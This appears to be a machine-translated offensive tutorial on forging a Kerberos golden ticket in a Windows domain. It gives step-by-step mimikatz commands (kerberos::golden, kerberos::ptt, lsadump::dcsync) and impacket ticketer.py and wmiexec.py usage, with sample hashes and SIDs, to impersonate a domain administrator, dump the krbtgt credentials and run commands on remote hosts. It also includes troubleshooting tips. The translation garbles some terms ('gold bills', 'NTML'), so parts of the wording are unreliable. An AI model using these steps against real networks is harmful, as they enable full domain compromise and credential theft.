principle
The principle of gold bills is to use the hash of krbtgt to forge the content of TGT. Change the client parameters and session key inside. Let TGS think that I am who I claim to be, of course I generally claim to be an administrator. The fourth step is mainly to verify the identity of the client.
The so-called gold ticket is actually the ticket of tgs in the second stage of kerberos authentication, which is TGT. This ticket is equivalent to an identity authentication credential for the requester. If this ticket can be forged, then any identity can be forged, and the golden ticket is an implementation method.
For the principle of kerberos protocol, please refer to: NTML authentication and kerberos authentication and PAC related knowledge .
Preconditions and operation steps
Precondition
1. The hash of krbtgt
2. The local administrator authority
3. The sid of the domain (the sid of an ordinary user is the sid of the domain except the last three digits)
4. The local administrator authority of any user in the domain
Steps
Empty existing notes
kerberos::purge
Making gold bills
kerberos::golden/user:Administrator/domain:test.com/sid:S-1-5-21-4166986646-4168497534-2490551922 /krbtgt:308390d1ca7addf22c84ba9f1d26cbe4 /ticket:1.kirbi
Load gold notes
kerberos::ptt 1.kirbi
Test results
lsadump::dcsync /domain:test.com /user:krbtgt
achieve
Implementation using mimikatz
mimikatz download address
Suppose we have obtained the domain-controlled krbtgt hash as d8d2ad72a119a8d418703f7a16580af6 in some way.
1. Open a cmd window with administrator rights
2. Use mimikatz
The first step: escalate rights & clear bills
klist purge #Execute in cmd
privilege::Debug
kerberos::purge
kerberos::list
Step 2: Make a gold bill
Obtain the domain sid: S-1-5-21-3763276348-88739081-2848684050-1110
execute the command:
kerberos::golden /user:Administrator /domain:test.com /sid:S-1-5-21-3763276348-88739081-2848684050 /krbtgt:d8d2ad72a119a8d418703f7a16580af6 /ticket:1.kirbi
After the execution is over, a 1.kirbi file will be generated in the running directory.
Step 3: Use gold bills
At this time, let's first see if we can use the dcsync command. This command can only be used with domain control authority. Its function is to export the account passwords of all users in the domain. Of course, the result is definitely a failure:
because we don't have a domain-controlled "ID card" that is tgt.
At this time, we will import the newly-made fake tgt into the system and test it:
kerberos::ptt 1.kirbi
lsadump::dcsync /domain:test.com /user:krbtgt
Some pits encountered
After finishing the ticket, execute lsadump::dcsync /domain:test.com /user:krbtgt, an error will be reported. After studying for a long time, I found out that as long as you wait a few minutes and then test and execute the command, it will succeed, or you can quit mimikatz and go in again. I don't know the principle.
This kind of ticket will only be stored in the command line window with administrator authority. If you change the command line window to execute at this time, you will find that there is no such certificate.
Implement with impacket
The principle is the same as using mimikatz, but the tools used are different.
achieve
Step 1: Open a command line window with administrator authority and clear the ticket
Step 2: Make ccache file
python ticketer.py -nthash d8d2ad72a119a8d418703f7a16580af6 -domain-sid S-1-5-21-3763276348-88739081-2848684050 -domain test.com administrator
Step 3: Change the environment variables
set KRB5CCNAME=C:\Users\zhangsan\Desktop\impacket-examples-windows-master\administrator.ccache
Step 4: Verify the results
python wmiexec.py test.com/administrator@yukong -k -no-pass
to sum up
Using impacket to make bills has certain limitations. After making bills, you can't see the cache under the klist command. There is no way to use net use \\ip\admin$ to establish a pipe connection. But you can use its own tool to remotely control the designated host under a certain command format. The command format is:
xxxx.py domain/username@hostname -k -no-pass
The domain here must be the same as the value of domain in systeminfo.
The hostname can be determined by the net view command, or nbtstat -A ip, or ping -a ip. The ping -a command is recommended.
Because test is a domain name, yukong is the host name.
What is FQDN?
FQDN is the abbreviation of Fully Qualified Domain Name/Fully Qualified Domain Name, Fully Qualified Domain Name, which is the domain name, will be resolved by DNS during access to obtain the IP. FQDN = Hostname + DomainName, for example, a company applies for the domain name comp.com, and at this time there is a host named web, you can use web.comp.com to get the host IP. If there are two hosts cmail and oa that provide mail and OA services, the following FQDN can be used at this time:
cmail.comp.com
oa.comp.com
For more usage of impacket, please see the following article:
Summary of the use of impacket